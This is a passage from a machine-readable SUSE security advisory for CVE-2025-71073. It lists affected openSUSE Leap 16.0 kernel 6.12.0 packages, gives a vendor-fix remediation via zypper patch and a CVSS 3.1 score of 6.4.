"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71073",
"url": "https://www.suse.com/security/cve/CVE-2025-71073"
},
{
"category": "external",
"summary": "SUSE Bug 1256632 for CVE-2025-71073",
"url": "https://bugzilla.suse.com/1256632"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
